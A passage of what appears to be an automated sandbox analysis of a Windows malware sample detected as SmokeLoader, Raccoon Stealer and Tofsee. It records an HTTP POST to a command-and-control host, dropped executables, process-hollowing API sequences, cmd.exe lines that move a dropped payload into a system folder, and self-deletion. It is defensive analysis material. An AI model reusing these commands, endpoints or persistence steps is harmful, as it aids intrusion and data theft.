","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: geenaldencia9.top
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49837 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected SmokeLoaderShow sources
                    Source: Yara matchFile source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                    Source: pAWNholT8X.exe, 00000000.00000002.364361089.000000000064A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    E-Banking Fraud:

                    barindex
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY

                    Spam, unwanted Advertisements and Ransom Demands:

                    barindex
                    Yara detected TofseeShow sources
                    Source: Yara matchFile source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY

                    System Summary:

                    barindex
                    PE file contains section with special charsShow sources
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name: MSI GF65
                    Source: 8433.exe.6.drStatic PE information: section name: MSI GF65
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name: Intel Co
                    Source: CEB6.exe.6.drStatic PE information: section name: Intel Co
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_0040238C
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_0040238C
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7E210
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7B990
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7EA38
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7EA29
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B0040
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051CA7D8
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051CDED8
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C83D0
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeCode function: 19_2_05810AC1
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeCode function: 19_2_05810AD0
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 22_2_0271ED28
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: E52D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: E52D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: E52D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: FE25.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_004019A9 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_0040194C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_0040196C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_00402610 NtClose,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_0040163E NtMapViewOfSection,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_0040223E NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_004019CB Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_004020CC NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_004019D4 NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_00401592 NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_004019B6 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_004015BC NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_1_00402610 NtClose,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_1_0040163E NtMapViewOfSection,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_1_0040223E NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_1_004020CC NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_1_00401592 NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_1_004015BC NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Roaming\ecrjwibCode function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_00730110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B2C00 NtUnmapViewOfSection,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B2CB8 NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B2CB2 NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B2BF8 NtUnmapViewOfSection,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_004019A9 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_0040194C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_0040196C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_00402610 NtClose,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_0040163E NtMapViewOfSection,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_0040223E NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_004019CB Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_004020CC NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_004019D4 NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_00401592 NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_004019B6 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 20_2_004015BC NtAllocateVirtualMemory,
                    Source: CEB6.exe.6.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                    Source: pAWNholT8X.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 6CB1.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: E52D.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: ecrjwib.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 8433.exe.6.drStatic PE information: Section: ZLIB complexity 0.999352181312
                    Source: 8433.exe.6.drStatic PE information: Section: .boot ZLIB complexity 0.995906760169
                    Source: CEB6.exe.6.drStatic PE information: Section: ZLIB complexity 0.999008098822
                    Source: CEB6.exe.6.drStatic PE information: Section: ZLIB complexity 0.989093223315
                    Source: CEB6.exe.6.drStatic PE information: Section: Intel Co ZLIB complexity 1.004296875
                    Source: pAWNholT8X.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ecrjwibJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@39/9@57/7
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_0040104B LoadResource,WaitForMultipleObjects,GlobalGetAtomNameW,SetEvent,FreeUserPhysicalPages,VerLanguageNameW,CreateActCtxW,lstrcpyW,EraseTape,ReadFile,FindFirstVolumeW,FindNextVolumeA,AddConsoleAliasW,InterlockedIncrement,
                    Source: pAWNholT8X.exeVirustotal: Detection: 36%
                    Source: pAWNholT8X.exeReversingLabs: Detection: 40%
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeProcess created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8433.exe C:\Users\user\AppData\Local\Temp\8433.exe
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeProcess created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Users\user\AppData\Roaming\ecrjwibProcess created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CEB6.exe C:\Users\user\AppData\Local\Temp\CEB6.exe
                    Source: C:\Users\user\AppData\Local\Temp\CEB6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E52D.exe C:\Users\user\AppData\Local\Temp\E52D.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FE25.exe C:\Users\user\AppData\Local\Temp\FE25.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\247A.exe C:\Users\user\AppData\Local\Temp\247A.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E52D.exe 'C:\Users\user\AppData\Local\Temp\E52D.exe'
                    Source: C:\Users\user\AppData\Local\Temp\247A.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3DEF.exe C:\Users\user\AppData\Local\Temp\3DEF.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E52D.exe 'C:\Users\user\AppData\Local\Temp\E52D.exe'
                    Source: C:\Users\user\AppData\Local\Temp\3DEF.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\gelvdtot\
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\3DEF.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeProcess created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8433.exe C:\Users\user\AppData\Local\Temp\8433.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CEB6.exe C:\Users\user\AppData\Local\Temp\CEB6.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E52D.exe C:\Users\user\AppData\Local\Temp\E52D.exe
                    Source: C:\Users\user\AppData\Roaming\ecrjwibProcess created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeProcess created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6CB1.tmpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCommand line argument: PN@
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCommand line argument: PN@
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: pAWNholT8X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8433.exe
                    Source: Binary string: #fNC:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: C:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: )/C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeUnpacked PE file: 4.2.pAWNholT8X.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeUnpacked PE file: 19.2.8433.exe.300000.0.unpack :ER; :R; :R;.idata:W;.themida:EW;.boot:ER;MSI GF65:ER;MSI GF65:ER;.rsrc:R; vs :ER; :R; :R;
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeUnpacked PE file: 20.2.6CB1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00402999 push ecx; ret
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00659D01 push eax; ret
                    Source: C:\Users\user\AppData\Roaming\ecrjwibCode function: 15_2_007693E1 push eax; ret
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_00402999 push ecx; ret
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_007A98D9 push eax; ret
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B2077 push ebx; retf
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C5D98 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C6DCF push eax; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C6F31 push ecx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C6F33 push ecx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C6FAF push ebp; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C3FA9 push ds; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C3FA0 push ds; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C796B pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C79FF pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C4013 push ds; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C7071 push esi; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C7B00 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C7B03 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C7A71 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C7AC9 pushad ; iretd
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C7ACB pushad ; iretd
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                    Source: 757C.exe.6.drStatic PE information: 0x9DFA6F45 [Sat Dec 27 08:03:17 2053 UTC]
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name: .themida
                    Source: 8433.exe.6.drStatic PE information: section name: .boot
                    Source: 8433.exe.6.drStatic PE information: section name: MSI GF65
                    Source: 8433.exe.6.drStatic PE information: section name: MSI GF65
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name: Intel Co
                    Source: CEB6.exe.6.drStatic PE information: section name: .themida
                    Source: CEB6.exe.6.drStatic PE information: section name: Intel Co
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                    Source: CEB6.exe.6.drStatic PE information: real checksum: 0x34f922 should be: 0x353a8e
                    Source: 757C.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x73fa7
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.5513445643
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.56187374958
                    Source: initial sampleStatic PE information: section name: entropy: 7.98639479395
                    Source: initial sampleStatic PE information: section name: .boot entropy: 7.9543414958
                    Source: initial sampleStatic PE information: section name: MSI GF65 entropy: 7.3616909148
                    Source: initial sampleStatic PE information: section name: MSI GF65 entropy: 7.38545121469
                    Source: initial sampleStatic PE information: section name: entropy: 7.98585699805
                    Source: initial sampleStatic PE information: section name: Intel Co entropy: 7.37183763951
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.53272046759
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.5513445643
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ecrjwibJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6CB1.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E52D.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8433.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CEB6.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ecrjwibJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\757C.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FE25.exeJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Uses known network protocols on non-standard portsShow sources
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 9080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9080 -> 49841
                    Deletes itself after installationShow sources
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\pawnholt8x.exeJump to behavior
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ecrjwib:Zone.Identifier read attributes | delete
                    Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
